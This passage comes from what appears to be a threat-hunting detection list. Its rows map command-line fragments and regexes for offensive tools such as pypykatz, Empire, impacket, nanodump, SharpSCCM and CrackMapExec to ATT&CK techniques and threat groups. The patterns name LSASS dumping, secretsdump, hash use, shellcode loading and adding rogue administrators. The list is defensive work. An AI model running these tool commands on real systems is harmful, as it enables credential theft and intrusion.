purge*",".{0,1000}\slive\skerberos\spurge.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1973" "* live kerberos roast*",".{0,1000}\slive\skerberos\sroast.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1974" "* live kerberos sessions*",".{0,1000}\slive\skerberos\ssessions.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1975" "* live kerberos tgt*",".{0,1000}\slive\skerberos\stgt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1976" "* live kerberos triage*",".{0,1000}\slive\skerberos\striage.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1977" "* live lsa -o *",".{0,1000}\slive\slsa\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1978" "* live lsa -o *",".{0,1000}\slive\slsa\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1979" "* live process create -c regedit*",".{0,1000}\slive\sprocess\screate\s\-c\sregedit.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1980" "* live smb client *",".{0,1000}\slive\ssmb\sclient\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1981" "* live smb dcsync *",".{0,1000}\slive\ssmb\sdcsync\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1982" "* live smb lsassdump *",".{0,1000}\slive\ssmb\slsassdump\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1983" "* live smb regdump *",".{0,1000}\slive\ssmb\sregdump\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1984" "* live smb secretsdump *",".{0,1000}\slive\ssmb\ssecretsdump\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1985" "* live smbapi localgroup enum -t*",".{0,1000}\slive\ssmbapi\slocalgroup\senum\s\-t.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1986" "* live smbapi session enum *",".{0,1000}\slive\ssmbapi\ssession\senum\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1987" "* live smbapi share enum*",".{0,1000}\slive\ssmbapi\sshare\senum.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1988" "* live users whoami*",".{0,1000}\slive\susers\swhoami.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1989" "* llmnr-resolve.nse*",".{0,1000}\sllmnr\-resolve\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1990" "* -LLMNRTTL *",".{0,1000}\s\-LLMNRTTL\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1991" "* -llmnrtypes AAAA*",".{0,1000}\s\-llmnrtypes\sAAAA.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","1992" "* lltd-discovery.nse*",".{0,1000}\slltd\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1993" "* --llvm-obfuscator * ",".{0,1000}\s\-\-llvm\-obfuscator\s.{0,1000}\s","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","1994" "* LMHASH:NTHASH*",".{0,1000}\sLMHASH\:NTHASH.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1995" "* lnkbomb.py*",".{0,1000}\slnkbomb\.py.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","1996" "* -LNKPath * -EncScript *",".{0,1000}\s\-LNKPath\s.{0,1000}\s\-EncScript\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-BackdoorLNK.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1997" "* load_extra_pots*",".{0,1000}\sload_extra_pots.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1998" "* loadbalancer.py*",".{0,1000}\sloadbalancer\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - 
TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","1999" "* --load-dll *ssp.dll*",".{0,1000}\s\-\-load\-dll\s.{0,1000}ssp\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","2000" "*----- LOADLIBRARYA HOOK -----*",".{0,1000}\-\-\-\-\-\sLOADLIBRARYA\sHOOK\s\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","3","N/A","N/A","N/A","N/A","2001" "* --load-shellcode *",".{0,1000}\s\-\-load\-shellcode\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","2002" "* local class-instances SMS_Authority*",".{0,1000}\slocal\sclass\-instances\sSMS_Authority.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2003" "* local class-properties SMS_Authority*",".{0,1000}\slocal\sclass\-properties\sSMS_Authority.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2004" "* -local dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAAA*",".{0,1000}\s\-local\sdc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAAA.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","2005" "* local grep *ccmsetup started *ccmsetup.log*",".{0,1000}\slocal\sgrep\s.{0,1000}ccmsetup\sstarted\s.{0,1000}ccmsetup\.log.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2006" "* local query * FROM SMS_Authority*",".{0,1000}\slocal\squery\s.{0,1000}\sFROM\sSMS_Authority.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2007" "* local secrets -m disk*",".{0,1000}\slocal\ssecrets\s\-m\sdisk.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2008" "* local secrets -m wmi*",".{0,1000}\slocal\ssecrets\s\-m\swmi.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2009" "* Local:DPAPIDecrypt*",".{0,1000}\sLocal\:DPAPIDecrypt.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","2010" "* Local:LoadEncryptionDll*",".{0,1000}\sLocal\:LoadEncryptionDll.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","2011" "* local_execution_linux.exe*",".{0,1000}\slocal_execution_linux\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","#linux","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2012" "* local_map.exe*",".{0,1000}\slocal_map\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - 
T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2013" "* local_thread_hijacking.exe*",".{0,1000}\slocal_thread_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2014" "* LocalAdminAccess.txt*",".{0,1000}\sLocalAdminAccess\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","2015" "* --localadminsessionenum *",".{0,1000}\s\-\-localadminsessionenum\s.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","2016" "* --local-auth --shares*",".{0,1000}\s\-\-local\-auth\s\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2017" "* localbrute.ps1*",".{0,1000}\slocalbrute\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2018" "* --LocalGMEnum --Host *",".{0,1000}\s\s\-\-LocalGMEnum\s\-\-Host\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","2019" "* localgroup administrators BitdefenderBounty 
*",".{0,1000}\slocalgroup\sadministrators\sBitdefenderBounty\s.{0,1000}","offensive_tool_keyword","Dispossessor","user name used in Dispossessor ransomware group notes - adding to admin group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","2020" "* localgroup administrators pwnd /add*",".{0,1000}\slocalgroup\sadministrators\spwnd\s\/add.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","#windows","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","2022" "* -LocalPoshC2ProjectDir *",".{0,1000}\s\-LocalPoshC2ProjectDir\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2023" "* -LocalPoshC2ProjectDir *",".{0,1000}\s\-LocalPoshC2ProjectDir\s.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. 
